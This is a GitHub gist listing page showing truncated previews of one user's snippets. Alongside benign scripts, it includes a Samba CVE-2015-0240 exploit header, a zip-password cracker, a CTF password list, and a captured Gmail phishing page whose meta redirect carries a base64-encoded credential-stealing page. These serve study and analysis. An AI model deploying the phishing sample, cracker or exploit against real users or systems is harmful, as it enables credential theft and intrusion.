Skip to content

Instantly share code, notes, and snippets.

View JohnTroony's full-sized avatar
🐙
multitasking

Octo Leap JohnTroony

🐙
multitasking
View GitHub Profile
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This script will delete all of the tweets in the specified account.
You may need to hit the "more" button on the bottom of your twitter profile
page every now and then as the script runs, this is due to a bug in twitter.
You will need to get a consumer key and consumer secret token to use this
script, you can do so by registering a twitter application at https://dev.twitter.com/apps
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#!/usr/bin/env python
# Troon Jay
from itertools import product
def allwords(chars, length):
for letters in product(chars, repeat=length):
yield ''.join(letters)
def main():
@JohnTroony
JohnTroony / CTF2_AH_PassList.txt
Created May 18, 2015 09:08
Password list for the CTF2 AH Internal CTF solution
Insecure_admina
Insecure_adminb
Insecure_adminc
Insecure_admind
Insecure_admine
Insecure_adminf
Insecure_adming
Insecure_adminh
Insecure_admini
Insecure_adminj
#!/usr/bin/env python
# Troon Jay
import zipfile
from threading import Thread
from optparse import OptionParser
def crackfile(zipfile,password):
try:
zipfile.extractall(pwd=password)

API Hack-a-thon

heroku

API Team

brandur mfine pedro sclasen geemus

@JohnTroony
JohnTroony / hidden_service.py
Created November 9, 2015 07:01 — forked from PaulSec/hidden_service.py
Launches tor and creates a hidden service with port 80 accessible (Flask)
import sys, threading, time
from stem.control import Controller
from stem import SocketError, UnsatisfiableRequest
import stem.process
from stem.util import term
from flask import Flask
import socks
WEB_PORT = 8080
@JohnTroony
JohnTroony / hardening_usbarmory.md
Created November 19, 2015 15:16 — forked from yann2192/hardening_usbarmory.md
Hardening USB Armory

Hardening the USB Armory

As a good crypto nerd, I usually use an entirely encrypted linux FS: / but also /boot using grub LUKS support. It's a good setup but it's not perfect, the BIOS and the bootloader are not protected.

I recently got a USBArmory and I wanted to apply the same (or a better) setup.

I found some useful links but no clear howto. So this is my setup.

@JohnTroony
JohnTroony / anazita.html
Created December 8, 2015 14:38
Gmail Phising Page at http://anazita.com/xmz Using Base64 and Javascript to steal your session and password.
<!--Using meta redirect-->
<meta http-equiv="Refresh" content="0; url= data:text/html;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQoJPGhlYWQ+DQoJCTxsaW5rIGhyZWY9Imh0dHA6Ly9zc2wuZ3N0YXRpYy5jb20vZG9jcy9kb2NsaXN0L2ltYWdlcy9pbmZpbml0ZV9hcnJvd19mYXZpY29uXzQuaWNvIiByZWw9InNob3J0Y3V0IGljb24iIC8+DQoJCTxtZXRhIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCIgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiAvPg0KCQk8bWV0YSBjaGFyc2V0PSJ1dGYtOCIgLz4NCgkJPG1ldGEgY29udGVudD0id2lkdGg9MzAwLCBpbml0aWFsLXNjYWxlPTEiIG5hbWU9InZpZXdwb3J0IiAvPg0KCQk8bWV0YSBuYW1lPSIiIHZhbHVlPSJub3RyYW5zbGF0ZSIgLz4NCgkJPG1ldGEgY29udGVudD0iIGlzIGVtYWlsIHRoYXQncyBpbnR1aXRpdmUsIGVmZmljaWVudCwgYW5kIHVzZWZ1bC4gMTUgR0Igb2Ygc3RvcmFnZSwgbGVzcyBzcGFtLCBhbmQgbW9iaWxlIGFjY2Vzcy4iIG5hbWU9ImRlc2NyaXB0aW9uIiAvPg0KCQk8dGl0bGU+IDwvdGl0bGU+DQoJCTxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpAZm9udC1mYWNlIHsNCiAgZm9udC1mYW1pbHk6ICdPcGVuIFNhbnMnOw0KICBmb250LXN0eWxlOiBub3JtYWw7DQogIGZvbnQtd2VpZ2h0OiAzMDA7DQogIHNyYzogbG9jYWwoJ09wZW4gU2FucyBMaWdodCcpLCBsb2NhbCgnT3BlblNhbnMtTGlnaHQnKSwgdXJsKG
@JohnTroony
JohnTroony / trackerPIDs_plotly.py
Created February 28, 2016 08:01
Using plotly to visualize PIDs of XFCE Tracker Application
from plotly.offline import plot
import plotly.graph_objs as go
import csv as csv
# Open the CSV file with data
readdata = csv.reader(open("cleanedTracks.csv"))
# Create empty lists for the data
miner_user_guides = []
miner_apps = []